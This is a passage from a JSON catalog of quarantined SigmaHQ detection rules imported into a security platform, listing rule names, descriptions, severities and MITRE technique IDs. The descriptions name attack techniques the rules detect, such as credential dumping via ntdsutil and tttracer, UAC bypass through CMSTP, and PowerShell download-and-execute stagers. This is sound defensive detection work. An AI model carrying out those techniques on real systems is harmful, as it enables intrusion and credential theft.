"type": "detection", "name": "Renamed Mavinject.EXE Execution", "description": "Detects the execution of a renamed version of the \"Mavinject\" process, which can be abused to perform process injection using the \"/INJECTRUNNING\" flag", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1055.001", "T1218.013" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-mavinject-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e6474a1b-5390-49cd-ab41-8d88655f7394", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_mavinject.yml" } }, { "id": "sigmahq-sigma-e66779cc-383e-4224-a3a4-267eeb585c40", "type": "detection", "name": "Bypass UAC via CMSTP", "description": "Detects command-line usage of the Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002", "T1218.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bypass-uac-via-cmstp.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e66779cc-383e-4224-a3a4-267eeb585c40", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml" } }, { "id": "sigmahq-sigma-e6c54d94-498c-4562-a37c-b469d8e9a275", "type": "detection", "name": "Suspicious PowerShell Download and Execute Pattern", "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-powershell-download-and-execute-pattern.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e6c54d94-498c-4562-a37c-b469d8e9a275", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_susp_download_patterns.yml" } }, { "id": "sigmahq-sigma-e6cb92b4-b470-4eb8-8a9d-d63e8583aae0", "type": "detection", "name": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell", "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-rundll-launcher-powershell.yaml", "quarantine_reason": "imported rule; 
upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e6cb92b4-b470-4eb8-8a9d-d63e8583aae0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_rundll.yml" } }, { "id": "sigmahq-sigma-e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", "type": "detection", "name": "VBA DLL Loaded Via Office Application", "description": "Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/vba-dll-loaded-via-office-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_office_vbadll_load.yml" } }, { "id": "sigmahq-sigma-e6e88853-5f20-4c4a-8d26-cd469fd8d31f", "type": "detection", "name": "Ntdsutil Abuse", "description": "Detects potential abuse of ntdsutil to dump ntds.dit database", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/ntdsutil-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e6e88853-5f20-4c4a-8d26-cd469fd8d31f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/esent/win_esent_ntdsutil_abuse.yml" } }, { "id": "sigmahq-sigma-e6fe26ee-d063-4f5b-b007-39e90aaf50e3", "type": "detection", "name": "Potential Persistence Via AutodialDLL", "description": "Detects changes to the \"AutodialDLL\" registry key, which could be used as a persistence method to load a custom DLL via the \"ws2_32\" library", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-autodialdll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_autodial_dll.yml" } }, { "id": "sigmahq-sigma-e76b413a-83d0-4b94-8e4c-85db4a5b8bdc", "type": "detection", "name": "Suspicious OpenSSH Daemon Error", "description": "Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploitation attempts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", 
"mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-openssh-daemon-error.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e76b413a-83d0-4b94-8e4c-85db4a5b8bdc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/builtin/sshd/lnx_sshd_susp_ssh.yml" } }, { "id": "sigmahq-sigma-e76c8240-d68f-4773-8880-5c6f63595aaf", "type": "detection", "name": "Time Travel Debugging Utility Usage - Image", "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/time-travel-debugging-utility-usage-image.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e76c8240-d68f-4773-8880-5c6f63595aaf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_dll_tttracer_module_load.yml" } }, { "id": "sigmahq-sigma-e76ca062-4de0-4d79-8d90-160a0d335eca", "type": "detection", "name": "PUA - Kernel Driver Utility (KDU) Execution", "description": "Detects execution of the Kernel Driver Utility (KDU) 
tool.\nKDU can be used to bypass driver signature enforcement and load unsigned or malicious drivers into the Windows kernel.\nPotentially allowing for privilege escalation, persistence, or evasion of security controls.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-kernel-driver-utility-kdu-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e76ca062-4de0-4d79-8d90-160a0d335eca", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_kdu_driver_tool.yml" } }, { "id": "sigmahq-sigma-e7888eb1-13b0-4616-bd99-4bc0c2b054b9", "type": "detection", "name": "Dllhost.EXE Execution Anomaly", "description": "Detects a \"dllhost\" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dllhost-exe-execution-anomaly.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dllhost_no_cli_execution.yml" } }, { "id": "sigmahq-sigma-e78c408a-e2ea-43cd-b5ea-51975cf358c0", "type": "detection", "name": "Disable Windows Firewall by Registry", "description": "Detects the EnableFirewall registry value being set to 0, which disables the Windows Firewall", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disable-windows-firewall-by-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e78c408a-e2ea-43cd-b5ea-51975cf358c0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_disable_windows_firewall.yml" } }, { "id": "sigmahq-sigma-e7a21b5f-d8c4-4ae5-b8d9-93c5d3f28e1c", "type": "detection", "name": "Suspicious DNS Query Indicating Kerberos Coercion via DNS Object SPN Spoofing", "description": "Detects DNS queries containing patterns associated with Kerberos coercion attacks via DNS object spoofing.\nThe pattern \"1UWhRCAAAAA..BAAAA\" is a base64-encoded signature that corresponds to a marshaled CREDENTIAL_TARGET_INFORMATION structure.\nAttackers can use this technique to coerce authentication from victim systems to attacker-controlled hosts.\nIt is one of the strong indicators of a Kerberos coercion attack, where adversaries manipulate DNS records\nto spoof Service Principal Names (SPNs) and redirect authentication requests like CVE-2025-33073.", "version": "1.0.0", "author": 
"AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1557.001", "T1187" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-dns-query-indicating-kerberos-coercion-via-dns-object-spn-spoofing.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e7a21b5f-d8c4-4ae5-b8d9-93c5d3f28e1c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/dns_query/dns_query_win_kerberos_coercion_via_dns_object_spoofing.yml" } }, { "id": "sigmahq-sigma-e7a2fd40-3ae1-4a85-bf80-15cf624fb1b1", "type": "detection", "name": "System Scripts Autorun Keys Modification", "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/system-scripts-autorun-keys-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e7a2fd40-3ae1-4a85-bf80-15cf624fb1b1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml" } }, { "id": "sigmahq-sigma-e7b18879-676e-4a0e-ae18-27039185a8e7", "type": "detection", 
"name": "New Netsh Helper DLL Registered From A Suspicious Location", "description": "Detects changes to the Netsh registry key to add a new DLL value that is located on a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1546.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-netsh-helper-dll-registered-from-a-suspicious-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e7b18879-676e-4a0e-ae18-27039185a8e7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_netsh_help_dll_persistence_susp_location.yml" } }, { "id": "sigmahq-sigma-e7bd1cfa-b446-4c88-8afb-403bcd79e3fa", "type": "detection", "name": "System Network Discovery - Linux", "description": "Detects enumeration of local network configuration", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1016" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/system-network-discovery-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e7bd1cfa-b446-4c88-8afb-403bcd79e3fa", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml" } }, { "id": "sigmahq-sigma-e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", "type": "detection", "name": "Copying Sensitive Files with Credential Data", "description": "Files with well-known filenames (sensitive files with credential data) copying", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.002", "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/copying-sensitive-files-with-credential-data.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml" } }, { "id": "sigmahq-sigma-e7d79a1b-25ed-4956-bd56-bd344fa8fd06", "type": "detection", "name": "OpenCanary - MySQL Login Attempt", "description": "Detects instances where a MySQL service on an OpenCanary node has had a login attempt.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003", "T1213" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-mysql-login-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
"SigmaHQ/sigma", "source_id": "e7d79a1b-25ed-4956-bd56-bd344fa8fd06", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_mysql_login_attempt.yml" } }, { "id": "sigmahq-sigma-e80273e1-9faf-40bc-bd85-dbaff104c4e9", "type": "detection", "name": "ESXi System Information Discovery Via ESXCLI", "description": "Detects execution of the \"esxcli\" command with the \"system\" flag in order to retrieve information about the different component of the system. Such as accounts, modules, NTP, etc.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033", "T1007", "T1059.012" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/esxi-system-information-discovery-via-esxcli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e80273e1-9faf-40bc-bd85-dbaff104c4e9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_esxcli_system_discovery.yml" } }, { "id": "sigmahq-sigma-e81528db-fc02-45e8-8e98-4e84aba1f10b", "type": "detection", "name": "Network Connection Initiated Via Notepad.EXE", "description": "Detects a network connection that is initiated by the \"notepad.exe\" process.\nThis might be a sign of process injection from a beacon process or something similar.\nNotepad rarely initiates a network communication except when printing documents for example.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": 
"high", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/network-connection-initiated-via-notepad-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e81528db-fc02-45e8-8e98-4e84aba1f10b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_notepad.yml" } }, { "id": "sigmahq-sigma-e8314f79-564d-4f79-bc13-fbc0bf2660d8", "type": "detection", "name": "Potential PowerShell Obfuscation Using Character Join", "description": "Detects specific techniques often seen used inside of PowerShell scripts to obfuscate Alias creation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-powershell-obfuscation-using-character-join.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e8314f79-564d-4f79-bc13-fbc0bf2660d8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_alias_obfscuation.yml" } }, { "id": "sigmahq-sigma-e83e8899-c9b2-483b-b355-5decc942b959", "type": "detection", "name": "Interesting Service Enumeration Via Sc.EXE", "description": "Detects 
the enumeration and query of interesting and in some cases sensitive services on the system via \"sc.exe\".\nAttackers often try to enumerate the services currently running on a system in order to find different attack vectors.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/interesting-service-enumeration-via-sc-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e83e8899-c9b2-483b-b355-5decc942b959", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sc_query_interesting_services.yml" } }, { "id": "sigmahq-sigma-e84d89c4-f544-41ca-a6af-4b92fd38b023", "type": "detection", "name": "Arbitrary File Download Via MSEDGE_PROXY.EXE", "description": "Detects usage of \"msedge_proxy.exe\" to download arbitrary files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/arbitrary-file-download-via-msedge-proxy-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e84d89c4-f544-41ca-a6af-4b92fd38b023", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": 
"2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_msedge_proxy_download.yml" } }, { "id": "sigmahq-sigma-e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", "type": "detection", "name": "New TimeProviders Registered With Uncommon DLL Name", "description": "Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\nAdversaries may abuse time providers to execute DLLs when the system boots.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-timeproviders-registered-with-uncommon-dll-name.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_timeproviders_dllname.yml" } }, { "id": "sigmahq-sigma-e890acee-d488-420e-8f20-d9b19b3c3d43", "type": "detection", "name": "Suspicious File Created by ArcSOC.exe", "description": "Detects instances where the ArcGIS Server process ArcSOC.exe, which hosts REST services running on an ArcGIS\nserver, creates a file with suspicious file type, indicating that it may be an executable, script file,\nor otherwise unusual.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1127", "T1105", "T1133" ], "log_source": null, 
"playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-file-created-by-arcsoc-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e890acee-d488-420e-8f20-d9b19b3c3d43", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_arcsoc_susp_file_created.yml" } }, { "id": "sigmahq-sigma-e8a52bbd-bced-459f-bd93-64db45ce7657", "type": "detection", "name": "Potential Suspicious PowerShell Module File Created", "description": "Detects the creation of a new PowerShell module in the first folder of the module directory structure \"\\WindowsPowerShell\\Modules\\malware\\malware.psm1\". This is somewhat an uncommon practice as legitimate modules often includes a version folder.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-suspicious-powershell-module-file-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e8a52bbd-bced-459f-bd93-64db45ce7657", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_powershell_module_susp_creation.yml" } }, { "id": "sigmahq-sigma-e8a677fd-248c-4eab-94df-de2f6f645884", "type": "detection", "name": "OpenCanary - NMAP OS 
Scan", "description": "Detects instances where an OpenCanary node has been targeted by a NMAP OS Scan", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1046" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-nmap-os-scan.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e8a677fd-248c-4eab-94df-de2f6f645884", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_portscan_nmap_os_scan.yml" } }, { "id": "sigmahq-sigma-e8a95b5e-c891-46e2-b33a-93937d3abc31", "type": "detection", "name": "Suspicious HH.EXE Execution", "description": "Detects a suspicious execution of a Microsoft HTML Help (HH.exe)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1047", "T1059.001", "T1059.003", "T1059.005", "T1059.007", "T1218", "T1218.001", "T1218.010", "T1218.011", "T1566", "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-hh-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e8a95b5e-c891-46e2-b33a-93937d3abc31", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_hh_susp_execution.yml" } }, { "id": "sigmahq-sigma-e8d34729-86a4-4140-adfd-0a29c2106307", "type": "detection", "name": "HackTool - CoercedPotato Execution", "description": "Detects the use of CoercedPotato, a tool for privilege escalation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-coercedpotato-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e8d34729-86a4-4140-adfd-0a29c2106307", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_coercedpotato.yml" } }, { "id": "sigmahq-sigma-e8ebd53a-30c2-45bd-81bb-74befba07bdb", "type": "detection", "name": "HTTP Logging Disabled On IIS Server", "description": "Detects changes to the IIS server configuration in order to disable HTTP logging for successful requests.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685.001", "T1505.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/http-logging-disabled-on-iis-server.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 